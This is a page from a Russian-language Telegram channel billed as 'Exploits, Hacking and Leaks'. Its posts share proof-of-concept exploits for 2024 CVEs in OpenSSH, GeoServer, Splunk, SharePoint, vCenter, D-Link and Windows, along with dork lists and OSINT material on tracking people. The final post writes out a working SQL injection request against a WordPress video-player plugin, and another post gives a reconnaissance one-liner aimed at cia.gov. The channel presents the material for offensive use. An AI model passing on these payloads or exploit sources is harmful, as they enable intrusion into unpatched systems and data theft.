Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
76 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
+
😱73👍14🔥8
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-29943
*
Ошибка JIT Pwn2Own SpiderMonkey
*
POC exploit
👍13🔥6
cve-2024-6387-poc.zip
21.1 KB
CVE-2024-6387: Критическая уязвимость OpenSSH без аутентификации RCE «regreSSHion»
*
Почитать
*
🔥40
Forwarded from Life-Hack - Хакер
Подведем итоги нашего бесплатного курса "OSINT для новичков". В рамках курса были изучены фундаментальные основы поиска по открытым источникам (Open-Source Intelligence) и инструменты для автоматизации этого процесса. Также были рассмотрены специальные сервисы для сбора данных, часть из которых уже достаточно известна в кругах специалистов, а часть знакома лишь единицам и стремительно набирает популярность. Этот курс поможет вам понять важность защиты данных и конфиденциальности.

Если вы что-то пропустили и желаете прочитать, то вот список пройденых материалов:

Первая серия материалов - "Введение в OSINT":
Введение в OSINT
Стороны, заинтересованные в OSINT информации
Типы сбора информации
Преимущества и проблемы OSINT
Правовые и этические ограничения
Цифровой след
Google Dorking

Вторая серия материалов - "OSINT инструменты":
Хакерские поисковые системы.
OSINT на платформе Telegram.
OSINT: theHarvester и HaveIbeenPwned.
OSINT: Snoop, GHunt, ReconSpider.
OSINT: Поиск по фото.
Инструменты для OSINT в VKontakte и YouTube.
OSINT: Отслеживание транспорта

Не забывайте делиться нашим бесплатным курсом "OSINT для новичков"!

P.S.: Подборки полезных материалов, которые мы любезно собрали специально для вас:
• OSINT подборка №1
• OSINT подборка №2
• OSINT подборка №3

P.P.S.: Ещё немного полезного по теме OSINT:
OSINT collection.
Remini: Инструмент размытия/повышения резкости изображения может помочь получить лучший результат обратного поиска изображений и распознавания лиц.
Cleanup.Pictures: Один из лучших онлайн-инструментов для удаления фотообъектов, которые я когда-либо видел.
Как «пробить» человека в Интернете: используем операторы Google и логику
Red Team Trickery.
История одного наследства: как я с помощью OSINT и социальной инженерии заскамил скамера.

Приватный клуб единомышленников, по всем вопросам вступления в клуб писать сюда.

#OSINT #обучениеOSINT #статья

LH | Новости | Курсы | Мемы
👍14🔥5
CVE-2024-28955 Automated Path Traversal & Local File Read
*
POC exploit

#poc #path
🔥15👍1
FreeBSD это вам не просто OS, это круто и стильно, а те кто вам говорит что там нет docker, просто не умеет в jail\зонирование и вот это вот все.
Кто написал всем известный OpenSSH ? хакеры из OpenBSD !
Почему в BSD нет прогремевшей CVE-2024-6387 ? glib да, но может там стабильность любят )))
*
Не для кого не секрет, что доля рынка BSD, за последние 15 лет серьезно упала,
*
НО списывать рано.
*
Во славу систем журнал читать тут

FreeBSD #OpenBSD #NetBSD #dragonFlyBSD #тычиBSD
🔥23👍7😱4
eBPF rootkit memory forensics
*
link
🔥16👍7
1 миллион дорков
*
download
🔥25👍4😱2
CVE-2024-36401
*
RCE GeoServer
*
exploit
🔥13👍5
CVE-2024-36991
*
Splunk /etc/passwd
*
exploit
🔥20👍4
главное что быстро, однострочник
*
curl -s 'https://crt.sh/?q=cia.gov&output=json' --compressed -H 'User-Agent: Mozilla/5.0'|jq -r '.[].common_name,.[].name_value'|sort -u
🔥48👍12😱4
This media is not supported in your browser
VIEW IN TELEGRAM
HEVD Exploit Windows 10 22H2
*
LPE exploit
🔥16👍3😱2
CVE-2024-5009
*
Progress WhatsUp Gold SetAdminPassword Privilege Escalation
*
POC
🔥16👍5
CVE-2024-38094 / CVE-2024-38024 / CVE-2024-38023
*
Microsoft SharePoint RCE
*
VIDEO
*
POC exploit
🔥10👍5😱1
СVE-2024-37081 VMware vCenter
*
Уязвимость в неправильной конфигурацией /etc/sudoers, позволяет сохранять опасные переменные среды при выполнении команд sudo.
*
POC exploit

#vmware
🔥9👍2
MSSQL ATTACK TOOL - pentesting MSSQL servers
*
writeUP
*
download

#tools #mssql
👍20🔥3
Forwarded from KnightPentest
Самый серьезный российский хакер bratva известный своими комментариями про киберпреступления(например LockBit ransomware: операция Cronos, его постили даже западные СМИ) поделился каналом про кибербезопасность который он читает с удовольствием:
https://news.1rj.ru/str/knightpentest
😱14👍10🔥6
CVE-2024-39202 D-Link DIR-823X
*
RCE
*
writeup
*
POC exploit
👍11
По поводу youtube
*
Пошел проверять, 4К прекрасно гоняется без тормозов.
Я и не сразу то понял почему 👌
Ну если по офф версии на территории РФ стоит старое оборудование google
которое не обновляется, а трафф вырос.
Что мешает обходиться это узкое место ?
Ответ: ничего.
Поставьте себе vpn (только не быдло wireguard и даже не православный openvpn, а что то современное, типа xtls). клиенты есть под любую платформу: unix/linux/windows/android/apple
И будет вам счастье.
Бонус трэк: конспирологическая версия
Подумалось, тут же наши выкатили аналог тытрубы - "Платформа", но нас уже палкой от youtube отгонишь, вот и зарезали траффик )))
👍32😱5
Exploiting Enterprise Backup Software For Privilege Escalation
*
часть первая
часть вторая
*

#LPE #interprise #research
👍9🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
Просыпаемся, завтракаем
*
CVE-2024-5522 WordPress HTML5 Video Player SQLi
*
usage:
GET  /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -
🔥39👍10😱6